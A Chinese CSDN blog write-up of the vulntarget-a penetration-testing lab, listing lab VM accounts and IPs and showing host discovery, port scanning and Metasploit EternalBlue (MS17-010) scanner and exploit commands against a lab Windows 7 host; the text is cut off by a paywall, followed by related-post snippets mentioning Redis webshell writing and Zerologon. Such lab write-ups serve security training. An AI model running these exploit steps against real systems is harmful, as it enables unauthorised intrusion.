Vulntarget-a打靶记录

最新推荐文章于 2024-05-02 15:27:09 发布
最新推荐文章于 2024-05-02 15:27:09 发布
阅读量501 收藏 4
点赞数 2
文章标签: 网络 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qu_xiao_lei/article/details/128767658
版权

Vulntarget-a

参考网址:

vulntarget漏洞靶场系列(一) (qq.com)

[永久开源] vulntarget-a_打靶记录 (qq.com)

环境搭建

攻击主机:Kali、Windows

目标主机:Win7、Win2016、Win2019

网络连接:
在这里插入图片描述
按照攻略给出的网络拓扑做出以下的网络配置。
在这里插入图片描述

内网部署

DC:Win2019

账号:administrator

密码:Admin@666

网卡:VMnet1

IP:10.0.10.110

Win2016

账号:vulntarget.com\win2016

密码:Admin#123

网卡1:VMnet2

IP1:10.0.20.99

网卡2:VMnet1

IP2:10.0.10.111

DNS:10.0.10.110

Win7

账号:win7

密码:admin

网卡1:NAT模式

IP1:192.168.127.91

网卡2:VMnet2

IP2:10.0.20.98

渗透测试

信息收集

IP扫描

  1. 使用kali下的arp-scan工具进行IP扫描,收集IP信息
sudo arp-scan -l

在这里插入图片描述
扫描到了个目标IP:192.168.127.128

端口扫描

  1. 使用kali下的nmap工具对两个目标进行端口扫描
    在这里插入图片描述
    该操作系统为Windows 7,开放了80、135、139、445端口,系统内有SMB服务,可能存在永恒之蓝漏洞。

漏洞探测

使用kali下的msf工具进行探测,该系统是否存在永恒之蓝漏洞。

use auxiliary/scanner/smb/smb_ms17_010

show options

set rhosts 192.168.127.128

run

在这里插入图片描述
确实存在永恒之蓝漏洞,利用该漏洞进行攻击

漏洞利用

使用kali下的msf工具进行探测,该系统是否存在永恒之蓝漏洞。

use exploit/windows/smb/ms17_010_eternalblue

show options

set rhosts 192.168.127.128

set lhosts 192.1
最低0.47元/天 解锁文章
kite-0102
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 5894
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
大数据-算法-激光打靶多路数据采集处理系统.pdf
04-16
大数据-算法
地空战-打靶游戏.rar
04-07
地空战-打靶游戏.rar
Vulntarget-a 打靶练习
最新发布
weixin_44770698的博客
05-02 682
vulntarget-a
VB Access 打靶记录系统全套源码和数据库
01-19
【工控老马出品,必属精品,亲测校正,质量保证】 资源名:VB Access 打靶记录系统全套源码和数据库 资源类型:程序源代码 源码说明: 完整可用的打靶记录系统源码,用于学生或新兵军训打靶记录,这是以前本人自己做的,绝对是原创。可作为初学者研究Access数据库,也可以在此基础上修改成其他系统,如学生成绩管理系统、体育比赛记录系统、图书管理系统、数据管理系统等等。 适合人群:新手及有一定经验的开发人员
35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码
04-17
35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码 1.合个人学习技术做项目参考合个人学习技术做项目参考 2.适合学生做毕业设计项目参考适合学生做毕业设计项目参考 3.适合小团队开发项目模型参考适合小团队开发项目模型参考
易语言地空战-打靶游戏
07-17
易语言地空战-打靶游戏源码,地空战-打靶游戏
内网渗透--vulntarget-a
m0_66299232的博客
04-04 985
1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录。1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。11.拿到管理员hash,执行提权exp,成功拿下域控!2.成功连接到redis服务,访问成功,不需要密码。
vultarget-a红日靶场全面解析(完整版)
问彡心的博客
11-02 8664
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
VulnTarget-a
大熊
06-16 474
实验目标:拿下域控桌面学习目标:信息收集/蚁剑webshell管理/CS上线/msf上线/流量代理转发/提权/漏洞利用等。靶机下载:其中vulntarget-a为本次实验机器》》》靶机信息《《《:::info跨网段需要路由转发。
vulntarget-a靶场的学习思考
weixin_48421613的博客
03-21 6366
前言: 最近玩了一下crow大表哥的靶场,觉得靶场打过之后确实是能用到很多技巧和知识,所以在这里做一些个人的学习总结,文章和靶场适合新人,因为不用做免杀,也可以让人初步的了解一下域环境 靶场由星期五实验室与乌鸦安全共同维护,GIthub可自行下载,Github原文链接以及原过程链接如下 https://github.com/crow821/vulntarget. https://mp.weixin.qq.com/s/uxwbnVOxkR8OBkkY9WW6aQ. 靶场下载地址如下 链接: ht
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在windows, linux 或 Mac平台下进行设置,为了能正常使用XVMA你需要按以下几个步骤配置Apache-PHP-MYSQL环境,这里我们使用的是XAMP,你也可以自己选择喜欢的集成包。 将xvwa文件复制到你的web目录,确保目录名依旧为xvwa。 配合kali效果更佳
靶场攻略 | 网络安全靶场合集
Python_0011的博客
10-11 3140
1JAVA环境。
关于用kail打vulntarget-a靶场使用CVE-2020-1472出现的问题
tiancaikunge的博客
06-20 368
关于用kail打vulntarget-a靶场使用CVE-2020-1472出现的问题
vulntarget-a靶场复现
weixin_52158313的博客
12-29 610
vulntarget-a靶场复现
渗透靶场——vulntarget-a综合靶场
tlovejr的博客
03-24 4810
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
【vulntarget】系列:vulntarget-a 练习WP
一只爱吃橙子的羊
07-09 611
【vulntarget】靶场系列,vulntarget-a 练习WP,会持续更新……
vulntarget-e WP
m0_64317625的博客
11-12 1356
vulntarget-e
vulntarget靶场系列-a-writeup
渗透测试研究中心
12-13 600
网络配置外网WIN7:ip1: 192.168.127.91/255.255.255.0 ,gw:192.168.127.2 (NAT模式)ip2:10.0.20.98-vmnet1(仅主机模式)域主机成员:10.0.20.99-vmnet1(仅主机模式)10.0.10.111-vmnet2(仅主机模式)域控:10.0.10.110-vmnet2(仅主机模式)密码配置:Win7:win7/adm...
蒙特卡洛打靶matlab
05-12
蒙特卡洛打靶是一种常用的数值模拟方法,可以用来估计某个过程的概率分布或期望值。在打靶问题中,我们需要估计一个枪手打中靶心的概率。 下面是使用 Matlab 实现蒙特卡洛打靶的代码示例: ```matlab % 定义打靶次数 N = 10000; % 定义靶心坐标和半径 x0 = 0; y0 = 0; R = 1; % 生成随机打靶点 x = rand(N, 1) * 2 - 1; y = rand(N, 1) * 2 - 1; % 判断每个打靶点是否在靶内 hit = (x - x0).^2 + (y - y0).^2 <= R^2; % 计算命中率 p = sum(hit) / N; % 显示结果 disp(['命中率为:', num2str(p)]); ``` 运行上述代码,可以得到指定次数的随机打靶结果,并计算出打中靶心的概率。通过增加打靶次数 N 的值,可以提高结果的精度。 需要注意的是,蒙特卡洛打靶方法本身并没有固定的误差范围,因此需要根据具体情况选择合适的打靶次数 N 来获得足够精确的结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值